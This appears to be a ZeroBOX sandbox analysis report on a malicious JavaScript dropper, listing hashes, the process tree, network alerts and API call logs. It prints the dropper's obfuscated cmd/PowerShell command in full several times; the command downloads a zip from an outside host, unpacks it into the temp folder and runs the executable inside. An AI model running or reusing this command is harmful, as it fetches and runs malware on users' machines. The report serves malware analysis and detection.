Summary | ZeroBOX

5943.js

Generic Malware Antivirus AntiDebug ZIP Format AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 June 9, 2023, 9 a.m. June 9, 2023, 9:02 a.m.
Size 4.9KB
Type ASCII text, with very long lines, with CRLF, LF line terminators
MD5 76f6a06e23970b7eb45cabba0418a5d2
SHA256 7ea08c1bfd78c89d38cf2ef50da2146622727072d956a379ae68a8fec3fa7fc3
CRC32 49111C10
ssdeep 96:5sBeprD12YkUUGsgZislNRGBhWp5quaajeQF+fjsfK0kS6RdX+lnF:SBOD1mUUGsBslTGBhU5q3aCQFGsfK0ki
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\5943.js

    3048
    • cmd.exe "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE

      1784
      • powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Users\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive -Path C:\Users\test22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Local\Temp;

        2344

Name Response Post-Analysis Lookup
fuelrescue.ie 185.2.67.20
IP Address Status Action
164.124.101.2 Active Moloch
185.2.67.20 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49165 -> 185.2.67.20:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49165
185.2.67.20:443
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA CN=fuelrescue.ie cc:86:2c:37:8c:85:c8:4d:41:b1:25:af:05:8b:ef:88:db:fd:95:72

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'C:\Users\test22\AppData\Local\Temp/1.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'XPZiglnScTRWqeE' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The term 'Expand-Archive' is not recognized as the name of a cmdlet, function,
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: script file, or operable program. Check the spelling of the name, or if a path
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: was included, verify that the path is correct and try again.
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: At line:1 char:213
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: + $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-A
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: gent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Use
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: rs\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive <<<< -Path C:\Users\t
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: est22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Loc
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: al\Temp;
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: + CategoryInfo : ObjectNotFound: (Expand-Archive:String) [], Comm
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: andNotFoundException
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x000000a7
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aae00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aae00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aae00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aad00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aad00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aad00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aad00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aad00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aad00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa700
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa8c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aa980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aaa00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005aaa00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f6b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f6b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f6b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f6b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f6b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0064f6b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
request GET https://fuelrescue.ie/wp/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2344
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73951000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2344
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73952000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02232000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02242000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0226a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02243000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02244000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02262000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02245000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0226c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02246000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02263000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02264000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02265000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02266000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02267000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02268000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02269000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05004000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05005000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05006000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05007000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05008000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05009000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2344
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
cmdline cmd.exe /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
cmdline pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','C:\Users\test22\AppData\Local\Temp/jly79.zip'); Expand-Archive -Path C:\Users\test22\AppData\Local\Temp/jly79.zip -DestinationPath C:\Users\test22\AppData\Local\Temp;
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://fuelrescue.ie/wp/','%temp%/jly79.zip'); Expand-Archive -Path %temp%/jly79.zip -DestinationPath %temp%; & %temp%/1.exe & XPZiglnScTRWqeE
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 1
Data received -d‚kš]®fÁJ£õÅ7Fë“9¤» 4³ÛÌux¸ò,/ÿ
Data received æ
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ɗÌÐz[Åb(s…jLç8EÎl«Ñéìf}†~ÀºˆÍfŽ‘mªÂÍä¥O³,ç
Data received p
Data received œÍÆ{åh‹G˜=¼Õ˺@*#¤ÌT÷M‡J­èX÷6áKZ´™Âû¾uzç 0/g›¾D…ÃÝ¿2BÕ¿2öÈW¥ƒ½E¬o—,cij è(%25PÜ<‹…ø |ÒÄ뀛fç BgˆµÒ™ŸÏ¥Máteu³§tä(­-É~~.ŒÇ#w?RMǪ¥0“Ñ“ô -ƒi՜ÖÇу3mpyægz©Ìø<^|l¢ëåÔ$IKf òr|zѺ4 ¨$Bs¼N™º„ªK͎hG½kŠ>Ì71ò@‰f@H—¹,µ€ã@¶à ²Ÿz/@ aUœ¡³$²0")V{òí˜VξK5[`¦Òˆ TzHÿM“Ý?'‹ß²,Žôw¿Ãy•qÇU, 8žëï¾'þÂè¢O¬…z#â·²š^unXÐ×mT'•Ñ]æsy€­Ä蘁ºþÀ¯b¸oôÏÑÜ
Data received 
Data received æ~ŒP‡6/¨Æ¹?5Ғßåär“¥ߍӑÙ
Data received `
Data received ¾[ã& Ï'Ë·¼dé{Ï£´-ò›U Äv±– Øÿ{Þ7
Data received j.Ûw‚$\2ä«6¥a‹’Ͳ©c`l]š{ëdé
